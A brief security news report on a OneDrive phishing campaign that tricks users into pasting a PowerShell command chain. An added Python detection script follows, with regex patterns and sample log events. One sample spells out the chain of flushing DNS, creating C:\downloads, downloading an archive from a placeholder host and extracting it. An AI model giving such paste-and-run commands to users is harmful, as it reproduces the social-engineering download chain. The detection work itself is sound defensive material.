Phishing, Malware

Malicious PowerShell script executed in OneDrive phishing campaign


Microsoft OneDrive users in the U.S., South Korea, India, Germany, Ireland, Norway, Italy, and the UK have been lured into running a malicious PowerShell script that compromises their systems as part of the OneDrive Pastejacking phishing and downloader attack campaign, The Hacker News reports.

Intrusions begin with phishing emails carrying an HTML file which, when clicked, displays a OneDrive connection failure notice that includes "How to fix" and "Details" options, according to a Trellix analysis. Targets who click "How to fix" are prompted to perform several steps that result in the execution of ipconfig /flushdns and the creation of a 'downloads' folder on the C drive, where an archive file is downloaded. The archive is then renamed and its contents extracted before script execution, said Trellix security researcher Rafael Pena. Proofpoint, ReliaQuest, and McAfee previously reported similar phishing campaigns leveraging the ClickFix attack technique.
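For defenders, the chain described above can be hunted in logged command text such as PowerShell script block logging (Event ID 4104) or process command lines. The following is an added example, not code from Trellix or the original report; the regexes, the threshold and the sample events are assumptions constructed for illustration.

```python
import re

# Steps named in the report. The regexes are assumptions about how each step
# could appear in a logged PowerShell command; they are not Trellix indicators.
STEPS = {
    "flush_dns": re.compile(r"\bipconfig(\.exe)?\s+/flushdns\b", re.I),
    "make_c_downloads": re.compile(
        r"\b(mkdir|md|New-Item)\b[^;|\n]*\bC:\\downloads\b", re.I),
    "fetch_archive": re.compile(
        r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer|DownloadFile)\b"
        r"[^;|\n]*\.(zip|7z|rar)\b", re.I),
    "rename_file": re.compile(r"\b(Rename-Item|ren|Move-Item)\b", re.I),
    "extract_archive": re.compile(
        r"\b(Expand-Archive|ExtractToDirectory)\b|\btar\s+-x", re.I),
}


def score_command(cmd):
    """Return the names of the reported steps present in one command line."""
    return [name for name, rx in STEPS.items() if rx.search(cmd)]


def triage(events, threshold=3):
    """Flag events whose command combines at least `threshold` steps.

    Each step alone is routine admin activity; the co-occurrence in a single
    pasted command is what matches the behaviour described in the article.
    """
    flagged = []
    for ev in events:
        hits = score_command(ev["command"])
        if len(hits) >= threshold:
            flagged.append((ev["host"], hits))
    return flagged


# Constructed sample events (hosts, paths and URLs are made up).
SAMPLE_EVENTS = [
    {"host": "ws-004", "command": r"ipconfig /flushdns"},
    {"host": "ws-009", "command":
        r"Invoke-WebRequest -Uri https://intranet.example.invalid/tools.zip "
        r"-OutFile D:\tools.zip; Expand-Archive D:\tools.zip -DestinationPath D:\tools"},
    {"host": "ws-017", "command":
        r"ipconfig /flushdns; New-Item -Path 'C:\downloads' -ItemType Directory; "
        r"Invoke-WebRequest -Uri https://files.example.invalid/fix.zip "
        r"-OutFile C:\downloads\fix.zip; Rename-Item C:\downloads\fix.zip tool.zip; "
        r"Expand-Archive C:\downloads\tool.zip -DestinationPath C:\downloads"},
]
```

Only the third event is flagged: a lone DNS flush or an ordinary download-and-extract stays below the threshold, which keeps routine admin work out of the results.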
